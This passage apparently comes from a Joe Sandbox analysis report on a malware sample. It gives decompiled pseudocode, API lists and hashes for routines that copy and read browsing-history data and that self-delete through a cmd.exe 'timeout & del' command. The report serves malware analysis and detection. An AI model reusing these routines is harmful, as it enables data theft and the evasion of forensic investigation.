                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 29D9A614
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9A624
                                        • _memset.LIBCMT ref: 29D9A637
                                        • wsprintfA.USER32 ref: 29D9A659
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9A6AD
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9A6B4
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9A6F4
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9A700
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9A71C
                                        • DeleteFileA.KERNEL32(?), ref: 29D9A789
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\History\%s_%s.txt
                                        • API String ID: 3817689429-211420586
                                        • Opcode ID: 526e7a2ba9a455bd6c4d9cb89e172e106bcfe17741946241f41c4995258cccad
                                        • Instruction ID: 253dedb0eacc4edff1ed200b106d0999327cd515183857ae0b22b2222d5a139c
                                        • Opcode Fuzzy Hash: 526e7a2ba9a455bd6c4d9cb89e172e106bcfe17741946241f41c4995258cccad
                                        • Instruction Fuzzy Hash: 1A5108B3941248ABD711EBA4EC49FDA7778EF58B01F00819CF50AD7140DA389A81EFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D9B0A0 Relevance: 31.7, APIs: 16, Strings: 2, Instructions: 156stringmemoryfileCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 57%
                                        			E29D9B0A0(CHAR* __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr _a4) {
				signed int _v8;
				char _v276;
				char _v540;
				char _v544;
				char _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr* _v560;
				void* __edi;
				void* __esi;
				signed int _t33;
				signed int _t34;
				signed int _t42;
				void* _t52;
				long _t56;
				void* _t62;
				int _t63;
				void* _t69;
				CHAR* _t72;
				intOrPtr* _t80;
				void* _t92;
				void* _t93;
				void* _t94;
				CHAR* _t95;
				CHAR* _t96;
				signed int _t97;
				void* _t98;
				void* _t101;
				void* _t103;
				void* _t104;
				signed int _t108;

				_t70 = __ebx;
				_t33 =  *0x29dd5664; // 0xd9555f04
				_t34 = _t33 ^ _t97;
				_t108 = _t34;
				_v8 = _t34;
				_v556 = _a4;
				_v552 = __ecx;
				_v560 = __edx;
				E29DB5640( &_v276, 0, 0x104);
				_t72 =  *0x29dd8098; // 0x15a1f98
				lstrcatA( &_v276, _t72);
				_t95 = E29DADFE0( &_v276, _t92, _t94, 0x1a);
				 *_t95 = 0;
				E29DAFCE4(GetTickCount());
				_t101 = _t98 + 0x14;
				_t93 = 0x1a;
				do {
					_t42 = E29DAFCF6(_t108);
					asm("cdq");
					_push(_t42 % 0xa);
					_push(_t95);
					wsprintfA(_t95, "%s%d");
					_t101 = _t101 + 0x10;
					_t93 = _t93 - 1;
				} while (_t93 != 0);
				_t95[0x1a] = 0;
				lstrcatA( &_v276, _t95);
				CopyFileA(__ebx,  &_v276, 1);
				E29DB5640( &_v540, _t93, 0x104);
				wsprintfA( &_v540, "\\History\\%s_%s.txt", _v552, _v556);
				_t96 =  *0x29dd7cf0; // 0x15971a0
				_t88 =  &_v548;
				_t52 =  *0x29dd8344( &_v276,  &_v548);
				_t103 = _t101 + 0x24;
				if(_t52 != 0) {
					L12:
					return E29DADF46(DeleteFileA( &_v276), _t70, _v8 ^ _t97, _t88, _t93, _t96);
				}
				_t56 =  *0x29dd82f8(_v548, _t96, 0xffffffff,  &_v544, _t52);
				_t104 = _t103 + 0x14;
				if(_t56 != 0) {
					L11:
					 *0x29dd8318(_v544);
					_t88 = _v548;
					 *0x29dd8348(_v548);
					goto L12;
				}
				_t96 = HeapAlloc(GetProcessHeap(), _t56, 0xf423f);
				_t62 =  *0x29dd8314(_v544);
				_t104 = _t104 + 4;
				if(_t62 != 0x64) {
					L6:
					_t63 = lstrlenA(_t96);
					_t80 = _v560;
					if(_t80 != 0) {
						__eflags =  *_t80 - 2;
						if( *_t80 == 2) {
							 *0x29dd8814 = E29DAC840( *((intOrPtr*)(_t80 + 4)), _t96,  &_v540, _t63, 3);
						} else {
							 *0x29dd8814 = 0x80000;
						}
					} else {
						 *0x29dd8814 = 0x10000;
					}
					goto L11;
				} else {
					goto L5;
				}
				do {
					L5:
					lstrcatA(_t96,  *0x29dd8334(_v544, 0));
					lstrcatA(_t96, "\n");
					_t69 =  *0x29dd8314(_v544);
					_t104 = _t104 + 0xc;
				} while (_t69 == 0x64);
				goto L6;
			}


































                                        0x29d9b0a0
                                        0x29d9b0a9
                                        0x29d9b0ae
                                        0x29d9b0ae
                                        0x29d9b0b0
                                        0x29d9b0bd
                                        0x29d9b0cc
                                        0x29d9b0d2
                                        0x29d9b0d8
                                        0x29d9b0dd
                                        0x29d9b0ee
                                        0x29d9b0fb
                                        0x29d9b100
                                        0x29d9b10a
                                        0x29d9b10f
                                        0x29d9b112
                                        0x29d9b117
                                        0x29d9b117
                                        0x29d9b11c
                                        0x29d9b124
                                        0x29d9b125
                                        0x29d9b12c
                                        0x29d9b132
                                        0x29d9b135
                                        0x29d9b135
                                        0x29d9b140
                                        0x29d9b144
                                        0x29d9b154
                                        0x29d9b167
                                        0x29d9b189
                                        0x29d9b18f
                                        0x29d9b195
                                        0x29d9b1a3
                                        0x29d9b1a9
                                        0x29d9b1ae
                                        0x29d9b2a3
                                        0x29d9b2bf
                                        0x29d9b2bf
                                        0x29d9b1c6
                                        0x29d9b1cc
                                        0x29d9b1d1
                                        0x29d9b283
                                        0x29d9b28a
                                        0x29d9b290
                                        0x29d9b29a
                                        0x00000000
                                        0x29d9b2a0
                                        0x29d9b1ea
                                        0x29d9b1f3
                                        0x29d9b1f9
                                        0x29d9b1ff
                                        0x29d9b23c
                                        0x29d9b23d
                                        0x29d9b243
                                        0x29d9b24b
                                        0x29d9b259
                                        0x29d9b25c
                                        0x29d9b27e
                                        0x29d9b25e
                                        0x29d9b25e
                                        0x29d9b25e
                                        0x29d9b24d
                                        0x29d9b24d
                                        0x29d9b24d
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x00000000
                                        0x29d9b201
                                        0x29d9b201
                                        0x29d9b215
                                        0x29d9b221
                                        0x29d9b22e
                                        0x29d9b234
                                        0x29d9b237
                                        0x00000000

                                        APIs
                                        • _memset.LIBCMT ref: 29D9B0D8
                                        • lstrcatA.KERNEL32(?,015A1F98,?,?), ref: 29D9B0EE
                                        • _malloc.LIBCMT ref: 29D9B0F6
                                          • Part of subcall function 29DADFE0: __FF_MSGBANNER.LIBCMT ref: 29DADFF9
                                          • Part of subcall function 29DADFE0: __NMSG_WRITE.LIBCMT ref: 29DAE000
                                          • Part of subcall function 29DADFE0: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,29D84BED,00000000), ref: 29DAE025
                                        • GetTickCount.KERNEL32 ref: 29D9B103
                                          • Part of subcall function 29DAFCE4: __getptd.LIBCMT ref: 29DAFCE9
                                        • _rand.LIBCMT ref: 29D9B117
                                          • Part of subcall function 29DAFCF6: __getptd.LIBCMT ref: 29DAFCF6
                                        • wsprintfA.USER32 ref: 29D9B12C
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?,?), ref: 29D9B144
                                        • CopyFileA.KERNEL32(?,?,00000001), ref: 29D9B154
                                        • _memset.LIBCMT ref: 29D9B167
                                        • wsprintfA.USER32 ref: 29D9B189
                                        • GetProcessHeap.KERNEL32(00000000,000F423F), ref: 29D9B1DD
                                        • HeapAlloc.KERNEL32(00000000), ref: 29D9B1E4
                                        • lstrcatA.KERNEL32(00000000,00000000), ref: 29D9B215
                                        • lstrcatA.KERNEL32(00000000,29DCD628), ref: 29D9B221
                                        • lstrlenA.KERNEL32(00000000), ref: 29D9B23D
                                        • DeleteFileA.KERNEL32(?), ref: 29D9B2AA
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$Heap$File__getptd_memsetwsprintf$AllocAllocateCopyCountDeleteProcessTick_malloc_randlstrlen
                                        • String ID: %s%d$\History\%s_%s.txt
                                        • API String ID: 3817689429-211420586
                                        • Opcode ID: dbc053420a8ab348fdf2e7970f8503c0d38c7ff47c691652a7e9e842671b1822
                                        • Instruction ID: 05ba0d8feab2beb6768a22b5c6c12d75aa2ffce87d1fd00616986d5911293356
                                        • Opcode Fuzzy Hash: dbc053420a8ab348fdf2e7970f8503c0d38c7ff47c691652a7e9e842671b1822
                                        • Instruction Fuzzy Hash: 9C5107B2941258ABD711EBA4EC49FDF7778EF48B01F00819DF509D6200DA389A85DFB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29D8EFB8 Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 275stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 65%
                                        			E29D8EFB8(char __ebx, intOrPtr* __esi) {
				intOrPtr* _t109;
				WCHAR* _t114;
				signed char _t115;
				intOrPtr _t117;
				char _t118;
				void* _t121;
				intOrPtr* _t122;
				intOrPtr* _t130;
				CHAR* _t143;
				CHAR* _t146;
				CHAR* _t151;
				char _t157;
				void* _t158;
				intOrPtr _t159;
				CHAR* _t165;
				intOrPtr _t166;
				intOrPtr _t174;
				CHAR* _t177;
				intOrPtr _t178;
				CHAR* _t193;
				void* _t197;
				void* _t203;
				intOrPtr _t204;
				void* _t205;
				intOrPtr* _t209;
				void* _t210;
				CHAR* _t212;
				signed int _t213;
				void* _t215;
				void* _t216;
				void* _t218;
				void* _t219;
				void* _t220;

				_t209 = __esi;
				_t157 = __ebx;
				 *(_t213 - 0xb90) = __ebx;
				E29DB5640();
				_t216 = _t215 + 0xc;
				lstrcatA(_t213 - 0x224, _t213 - 0x00000afc & (0 |  *0x29dd8500(__ebx, 0x1a, __ebx, __ebx, _t213 - 0xafc) < 0x00000000) - 0x00000001);
				_t193 =  *0x29dd7dbc; // 0x15a2250
				lstrcatA(_t213 - 0x224, _t193);
				lstrcatA(_t213 - 0x11c, _t213 - 0x224);
				lstrcatA(_t213 - 0x11c, "\\");
				_t165 =  *0x29dd7d54; // 0x15a1fe0
				_t195 = _t213 - 0x11c;
				lstrcatA(_t213 - 0x11c, _t165);
				_t109 = _t213 - 0x11c;
				 *((intOrPtr*)(_t213 - 0xb3c)) = 0xf;
				 *((intOrPtr*)(_t213 - 0xb40)) = __ebx;
				 *((char*)(_t213 - 0xb50)) = __ebx;
				_t203 = _t109 + 1;
				do {
					_t166 =  *_t109;
					_t109 = _t109 + 1;
				} while (_t166 != __ebx);
				E29D892C0(_t213 - 0xb50, _t213 - 0x11c, _t109 - _t203);
				 *((intOrPtr*)(_t213 - 4)) = __ebx;
				_t114 = E29DA4990(_t213 - 0xb50, _t213 - 0xb6c, _t213 - 0xb6c);
				if(_t114[0xa] >= 8) {
					_t114 =  *_t114;
				}
				_t115 = GetFileAttributesW(_t114);
				if(_t115 == 0xffffffff || (_t115 & 0x00000010) != 0) {
					_t204 = 0;
					__eflags = 0;
				} else {
					_t204 = 1;
				}
				if( *((intOrPtr*)(_t213 - 0xb58)) >= 8) {
					_t195 =  *(_t213 - 0xb6c);
					_push( *(_t213 - 0xb6c));
					E29DADF3B();
					_t216 = _t216 + 4;
				}
				 *((intOrPtr*)(_t213 - 4)) = 0xffffffff;
				 *((intOrPtr*)(_t213 - 0xb58)) = 7;
				 *((intOrPtr*)(_t213 - 0xb5c)) = _t157;
				 *(_t213 - 0xb6c) = 0;
				if( *((intOrPtr*)(_t213 - 0xb3c)) >= 0x10) {
					_push( *((intOrPtr*)(_t213 - 0xb50)));
					E29DADF3B();
					_t216 = _t216 + 4;
				}
				 *((intOrPtr*)(_t213 - 0xb3c)) = 0xf;
				 *((intOrPtr*)(_t213 - 0xb40)) = _t157;
				 *((char*)(_t213 - 0xb50)) = _t157;
				if(_t204 != _t157) {
					_t195 = _t213 - 0xb90;
					_t121 = E29D99300(_t213 - 0xb8c, _t213 - 0xb90, _t213 - 0x11c);
					_t218 = _t216 + 4;
					if(_t121 != 0) {
						_t122 = _t209;
						 *((intOrPtr*)(_t213 - 0xb20)) = 0xf;
						 *((intOrPtr*)(_t213 - 0xb24)) = _t157;
						 *((char*)(_t213 - 0xb34)) = _t157;
						_t197 = _t122 + 1;
						do {
							_t174 =  *_t122;
							_t122 = _t122 + 1;
							_t233 = _t174 - _t157;
						} while (_t174 != _t157);
						E29D892C0(_t213 - 0xb34, _t209, _t122 - _t197);
						 *((intOrPtr*)(_t213 - 4)) = 1;
						E29DA44D0(_t197, _t233, _t213 - 0xb18, _t213 - 0xb34);
						_t219 = _t218 + 8;
						 *((char*)(_t213 - 4)) = 3;
						if( *((intOrPtr*)(_t213 - 0xb20)) >= 0x10) {
							_push( *((intOrPtr*)(_t213 - 0xb34)));
							E29DADF3B();
							_t219 = _t219 + 4;
						}
						 *((intOrPtr*)(_t213 - 0xb20)) = 0xf;
						 *((intOrPtr*)(_t213 - 0xb24)) = _t157;
						 *((char*)(_t213 - 0xb34)) = _t157;
						E29DB5640(_t213 - 0x32c, _t157, 0x104);
						_t177 =  *0x29dd7a94; // 0x15a2238
						_t220 = _t219 + 0xc;
						lstrcatA(_t213 - 0x32c, _t177);
						_t130 = _t213 - 0x32c;
						_t195 = _t130 + 1;
						do {
							_t178 =  *_t130;
							_t130 = _t130 + 1;
						} while (_t178 != _t157);
						if(E29D95240(0, _t213 - 0xb18, _t213 - 0x32c, _t130 - _t195) != 0xffffffff) {
							E29D896C0(_t213 - 0xb18, _t157, _t134 + 0xc);
							E29D896C0(_t213 - 0xb18, 0x8c, 0xffffffff);
							_t159 =  *((intOrPtr*)(_t213 - 0xb18));
							if( *((intOrPtr*)(_t213 - 0xb04)) < 0x10) {
								_t159 = _t213 - 0xb18;
							}
							if(E29D991B0(_t213 - 0xb94, _t159, _t213 - 0xb98) != 0) {
								E29DB5640(_t213 - 0x714, 0, 0x3e8);
								_t208 =  *((intOrPtr*)(_t213 - 0xb98));
								_t143 = E29D99510(_t213 - 0xb88,  *((intOrPtr*)(_t213 - 0xb98)),  *(_t213 - 0xb94),  *((intOrPtr*)(_t213 - 0xb8c)),  *(_t213 - 0xb90));
								_t220 = _t220 + 0x14;
								 *((char*)(_t213 - 4)) = 4;
								if(_t143[0x14] >= 0x10) {
									_t143 =  *_t143;
								}
								_t195 = _t213 - 0x714;
								lstrcatA(_t213 - 0x714, _t143);
								 *((char*)(_t213 - 4)) = 3;
								E29D89160(_t213 - 0xb88);
								_t146 =  *0x29dd7f1c; // 0x15a23b8
								_t212 =  *(_t213 - 0xb9c);
								lstrcatA(_t212, _t146);
								_push("NULL");
								_push(_t213 - 0x714);
								if( *0x29dd8550() != 0) {
									_t195 =  *(_t213 - 0xb94);
									_t151 = E29D99510(_t213 - 0xb88, _t208,  *(_t213 - 0xb94),  *((intOrPtr*)(_t213 - 0xb8c)),  *(_t213 - 0xb90));
									_t220 = _t220 + 8;
									 *((char*)(_t213 - 4)) = 5;
									if(_t151[0x14] >= 0x10) {
										_t151 =  *_t151;
									}
									lstrcatA(_t212, _t151);
									 *((char*)(_t213 - 4)) = 3;
									E29D89160(_t213 - 0xb88);
								}
								lstrcatA(_t212, "\n");
							}
							_t157 = 0;
						}
						 *((intOrPtr*)(_t213 - 4)) = 0xffffffff;
						if( *((intOrPtr*)(_t213 - 0xb04)) >= 0x10) {
							_push( *((intOrPtr*)(_t213 - 0xb18)));
							E29DADF3B();
						}
						 *((intOrPtr*)(_t213 - 0xb04)) = 0xf;
						 *((intOrPtr*)(_t213 - 0xb08)) = _t157;
						 *((char*)(_t213 - 0xb18)) = _t157;
					}
				}
				_t117 =  *((intOrPtr*)(_t213 - 0xb8c));
				if(_t117 != _t157) {
					 *0x29dd8464(_t117, _t157);
					 *((intOrPtr*)(_t213 - 0xb8c)) = _t157;
				}
				_t118 =  *(_t213 - 0xb90);
				if(_t118 != _t157) {
					_t118 =  *0x29dd8518(_t118);
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t213 - 0xc));
				_pop(_t205);
				_pop(_t210);
				_pop(_t158);
				return E29DADF46(_t118, _t158,  *(_t213 - 0x14) ^ _t213, _t195, _t205, _t210);
			}




































                                        0x29d8efb8
                                        0x29d8efb8
                                        0x29d8efb8
                                        0x29d8efbe
                                        0x29d8efc3
                                        0x29d8eff0
                                        0x29d8eff6
                                        0x29d8f004
                                        0x29d8f018
                                        0x29d8f02a
                                        0x29d8f030
                                        0x29d8f037
                                        0x29d8f03e
                                        0x29d8f044
                                        0x29d8f04a
                                        0x29d8f054
                                        0x29d8f05a
                                        0x29d8f060
                                        0x29d8f063
                                        0x29d8f063
                                        0x29d8f065
                                        0x29d8f066
                                        0x29d8f07a
                                        0x29d8f08c
                                        0x29d8f08f
                                        0x29d8f098
                                        0x29d8f09a
                                        0x29d8f09a
                                        0x29d8f09d
                                        0x29d8f0a6
                                        0x29d8f0b3
                                        0x29d8f0b3
                                        0x29d8f0ac
                                        0x29d8f0ac
                                        0x29d8f0ac
                                        0x29d8f0bc
                                        0x29d8f0be
                                        0x29d8f0c4
                                        0x29d8f0c5
                                        0x29d8f0ca
                                        0x29d8f0ca
                                        0x29d8f0cf
                                        0x29d8f0dd
                                        0x29d8f0e7
                                        0x29d8f0ed
                                        0x29d8f0f4
                                        0x29d8f0fc
                                        0x29d8f0fd
                                        0x29d8f102
                                        0x29d8f102
                                        0x29d8f105
                                        0x29d8f10f
                                        0x29d8f115
                                        0x29d8f11d
                                        0x29d8f12a
                                        0x29d8f136
                                        0x29d8f13b
                                        0x29d8f140
                                        0x29d8f14b
                                        0x29d8f14d
                                        0x29d8f153
                                        0x29d8f159
                                        0x29d8f15f
                                        0x29d8f162
                                        0x29d8f162
                                        0x29d8f164
                                        0x29d8f165
                                        0x29d8f165
                                        0x29d8f173
                                        0x29d8f186
                                        0x29d8f18d
                                        0x29d8f192
                                        0x29d8f19a
                                        0x29d8f1a4
                                        0x29d8f1ac
                                        0x29d8f1ad
                                        0x29d8f1b2
                                        0x29d8f1b2
                                        0x29d8f1c2
                                        0x29d8f1c8
                                        0x29d8f1ce
                                        0x29d8f1d4
                                        0x29d8f1d9
                                        0x29d8f1df
                                        0x29d8f1ea
                                        0x29d8f1f0
                                        0x29d8f1f6
                                        0x29d8f200
                                        0x29d8f200
                                        0x29d8f202
                                        0x29d8f203
                                        0x29d8f222
                                        0x29d8f233
                                        0x29d8f245
                                        0x29d8f24a
                                        0x29d8f256
                                        0x29d8f258
                                        0x29d8f258
                                        0x29d8f271
                                        0x29d8f285
                                        0x29d8f296
                                        0x29d8f2af
                                        0x29d8f2b4
                                        0x29d8f2b7
                                        0x29d8f2bf
                                        0x29d8f2c1
                                        0x29d8f2c1
                                        0x29d8f2c4
                                        0x29d8f2cb
                                        0x29d8f2d7
                                        0x29d8f2db
                                        0x29d8f2e0
                                        0x29d8f2e5
                                        0x29d8f2ed
                                        0x29d8f2f3
                                        0x29d8f2fe
                                        0x29d8f307
                                        0x29d8f316
                                        0x29d8f325
                                        0x29d8f32a
                                        0x29d8f32d
                                        0x29d8f335
                                        0x29d8f337
                                        0x29d8f337
                                        0x29d8f33b
                                        0x29d8f347
                                        0x29d8f34b
                                        0x29d8f34b
                                        0x29d8f356
                                        0x29d8f356
                                        0x29d8f35c
                                        0x29d8f35c
                                        0x29d8f35e
                                        0x29d8f36c
                                        0x29d8f374
                                        0x29d8f375
                                        0x29d8f37a
                                        0x29d8f37d
                                        0x29d8f387
                                        0x29d8f38d
                                        0x29d8f38d
                                        0x29d8f140
                                        0x29d8f393
                                        0x29d8f39b
                                        0x29d8f39f
                                        0x29d8f3a5
                                        0x29d8f3a5
                                        0x29d8f3ab
                                        0x29d8f3b3
                                        0x29d8f3b6
                                        0x29d8f3b6
                                        0x29d8f3bf
                                        0x29d8f3c7
                                        0x29d8f3c8
                                        0x29d8f3c9
                                        0x29d8f3d7

                                        APIs
                                        • _memset.LIBCMT ref: 29D8EFBE
                                        • SHGetFolderPathA.SHELL32(?,0000001A,?,?,?), ref: 29D8EFD2
                                        • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,?), ref: 29D8EFF0
                                        • lstrcatA.KERNEL32(?,015A2250,?,0000001A,?,?,?), ref: 29D8F004
                                        • lstrcatA.KERNEL32(?,?,?,0000001A,?,?,?), ref: 29D8F018
                                        • lstrcatA.KERNEL32(?,29DCD7BC,?,0000001A,?,?,?), ref: 29D8F02A
                                        • lstrcatA.KERNEL32(?,015A1FE0,?,0000001A,?,?,?), ref: 29D8F03E
                                        • GetFileAttributesW.KERNEL32(00000000,?,?,?), ref: 29D8F09D
                                        • _memset.LIBCMT ref: 29D8F1D4
                                        • lstrcatA.KERNEL32(?,015A2238,?,?,?,?,?,?), ref: 29D8F1EA
                                        • _memset.LIBCMT ref: 29D8F285
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 29D8F2CB
                                        • lstrcatA.KERNEL32(?,015A23B8,?,?,?,?,?), ref: 29D8F2ED
                                        • StrCmpCA.SHLWAPI(?,NULL,?,?,?,?,?), ref: 29D8F2FF
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,?,?,?), ref: 29D8F33B
                                        • lstrcatA.KERNEL32(?,29DCD628,?,?,?,?,?), ref: 29D8F356
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$_memset$AttributesFileFolderPath
                                        • String ID: NULL
                                        • API String ID: 3917447719-324932091
                                        • Opcode ID: 1cb7e9aa88b80ee2d6198be1f1f60bfb21cb3ebf20c9b95336199d8e7f9fe3a8
                                        • Instruction ID: f6217ceb4c9396e77cfb900c7fd9b6cc45df6892206976ce3c05e8032b3f05fa
                                        • Opcode Fuzzy Hash: 1cb7e9aa88b80ee2d6198be1f1f60bfb21cb3ebf20c9b95336199d8e7f9fe3a8
                                        • Instruction Fuzzy Hash: 1EB190B2910258AFDB25DF64CC94BDEB779BF54308F0081E9D109A7581DB349B86DFA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA4E60 Relevance: 29.8, APIs: 11, Strings: 6, Instructions: 89stringCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 69%
                                        			E29DA4E60() {
				int _v8;
				char _v16;
				signed int _v20;
				char _v280;
				intOrPtr _v288;
				int _v292;
				char _v308;
				int _v336;
				int _v340;
				int _v344;
				CHAR* _v348;
				CHAR* _v352;
				CHAR* _v356;
				int _v360;
				int _v364;
				char _v368;
				signed int _t32;
				signed int _t33;
				CHAR* _t42;
				void* _t60;
				signed int _t64;
				void* _t65;
				void* _t68;

				_push(0xffffffff);
				_push(E29DC1FBB);
				_push( *[fs:0x0]);
				_t32 =  *0x29dd5664; // 0xd9555f04
				_t33 = _t32 ^ _t64;
				_v20 = _t33;
				_push(_t33);
				 *[fs:0x0] =  &_v16;
				E29DB5640( &_v280, 0, 0x104);
				E29DB5640( &_v368, 0, 0x3c);
				lstrcatA( &_v280, "/c ");
				lstrcatA( &_v280, "timeout /t 6 & del /f /q \"");
				_t42 = E29DA4BA0(0, _t60,  &_v308, GetCurrentProcessId());
				_t68 = _t65 - 0x160 + 0x1c;
				_v8 = 0;
				if(_t42[0x14] >= 0x10) {
					_t42 =  *_t42;
				}
				lstrcatA( &_v280, _t42);
				_v8 = 0xffffffff;
				if(_v288 >= 0x10) {
					_push(_v308);
					E29DADF3B();
					_t68 = _t68 + 4;
				}
				_v288 = 0xf;
				_v292 = 0;
				_v308 = 0;
				lstrcatA( &_v280, "\" & exit");
				_v368 = 0x3c;
				_v364 = 0;
				_v360 = 0;
				_v356 = "open";
				_v352 = "C:\\Windows\\System32\\cmd.exe";
				_v348 =  &_v280;
				_v344 = 0;
				_v340 = 0;
				_v336 = 0;
				 *0x29dd8584( &_v368);
				E29DB5640( &_v368, 0, 0x3c);
				E29DB5640( &_v280, 0, 0x104);
				ExitProcess(0);
			}


























                                        0x29da4e63
                                        0x29da4e65
                                        0x29da4e70
                                        0x29da4e77
                                        0x29da4e7c
                                        0x29da4e7e
                                        0x29da4e83
                                        0x29da4e87
                                        0x29da4e9c
                                        0x29da4eab
                                        0x29da4ebf
                                        0x29da4ed1
                                        0x29da4ee4
                                        0x29da4ee9
                                        0x29da4ef1
                                        0x29da4ef7
                                        0x29da4ef9
                                        0x29da4ef9
                                        0x29da4f03
                                        0x29da4f09
                                        0x29da4f16
                                        0x29da4f1e
                                        0x29da4f1f
                                        0x29da4f24
                                        0x29da4f24
                                        0x29da4f33
                                        0x29da4f3d
                                        0x29da4f43
                                        0x29da4f49
                                        0x29da4f5c
                                        0x29da4f66
                                        0x29da4f6c
                                        0x29da4f72
                                        0x29da4f7c
                                        0x29da4f86
                                        0x29da4f8c
                                        0x29da4f92
                                        0x29da4f98
                                        0x29da4f9e
                                        0x29da4fae
                                        0x29da4fc0
                                        0x29da4fc9

                                        APIs
                                        • _memset.LIBCMT ref: 29DA4E9C
                                        • _memset.LIBCMT ref: 29DA4EAB
                                        • lstrcatA.KERNEL32(?,/c ,?,?,?,D9555F04), ref: 29DA4EBF
                                        • lstrcatA.KERNEL32(?,timeout /t 6 & del /f /q ",?,?,?,D9555F04), ref: 29DA4ED1
                                        • GetCurrentProcessId.KERNEL32(?,?,?,D9555F04), ref: 29DA4ED7
                                          • Part of subcall function 29DA4BA0: OpenProcess.KERNEL32(00000410,00000000,29D92FA7,00000010), ref: 29DA4BC9
                                          • Part of subcall function 29DA4BA0: GetModuleFileNameExA.PSAPI(00000000,00000000,?,00000104), ref: 29DA4BE4
                                          • Part of subcall function 29DA4BA0: CloseHandle.KERNEL32(00000000), ref: 29DA4BEB
                                        • lstrcatA.KERNEL32(?,00000000,?,?,?,?,D9555F04), ref: 29DA4F03
                                        • lstrcatA.KERNEL32(?," & exit,?,?,?,?,D9555F04), ref: 29DA4F49
                                        • ShellExecuteEx.SHELL32(D9555F04), ref: 29DA4F9E
                                        • _memset.LIBCMT ref: 29DA4FAE
                                        • _memset.LIBCMT ref: 29DA4FC0
                                        • ExitProcess.KERNEL32 ref: 29DA4FC9
                                        Strings
                                        Memory Dump Source
                                        • Source File: 0000000C.00000002.2423789607.0000000029D80000.00000040.00001000.00020000.00000000.sdmp, Offset: 29D80000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_12_2_29d80000_pdf4ik.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: _memsetlstrcat$Process$CloseCurrentExecuteExitFileHandleModuleNameOpenShell
                                        • String ID: " & exit$/c $<$C:\Windows\System32\cmd.exe$open$timeout /t 6 & del /f /q "
                                        • API String ID: 790161300-266446750
                                        • Opcode ID: 3586d598e1c7df207d94fab30b10477dd05e75a7bd1cc7e158b7d7e60bc69603
                                        • Instruction ID: a3441af988ed17a5d42af8df28dc4a0ce43570775818588737099910efa7102c
                                        • Opcode Fuzzy Hash: 3586d598e1c7df207d94fab30b10477dd05e75a7bd1cc7e158b7d7e60bc69603
                                        • Instruction Fuzzy Hash: 7F3139B2C01268AFDB25DF54DC84FDAB778BB18B00F4042E9E209A6640D7345B85DFA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 29DA3DF0 Relevance: 28.2, APIs: 10, Strings: 6, Instructions: 169memorycomtimeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 15%
                                        			E29DA3DF0() {
				char _v8;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				struct _SYSTEMTIME _v40;
				intOrPtr _v48;
				long _v52;
				char _v68;
				void* _v72;
				void* _v76;
				void* _v80;
				void* _v84;
				char _v88;
				intOrPtr _v100;
				char _v108;
				char _v116;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t46;
				signed int _t47;
				intOrPtr* _t50;
				CHAR* _t53;
				intOrPtr* _t55;
				intOrPtr* _t57;
				intOrPtr* _t60;
				void* _t72;
				void* _t74;
				intOrPtr _t90;
				void* _t96;
				void* _t97;
				void* _t98;
				void* _t99;
				FILETIME* _t100;
				CHAR* _t101;
				signed int _t102;
				void* _t103;

				_t46 =  *0x29dd5664; // 0xd9555f04
				_t47 = _t46 ^ _t102;
				_v24 = _t47;
				 *[fs:0x0] =  &_v16;
				_v20 = _t103 - 0x64;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t47, _t96, _t98, _t72,  *[fs:0x0], E29DC1CC0, 0xffffffff);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_v84 = 0;
				__imp__CoCreateInstance(0x29dc54f0, 0, 1, 0x29dc5420,  &_v84);
				_t50 = _v84;
				_t89 =  &_v72;
				_push( &_v72);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
				_push(0);
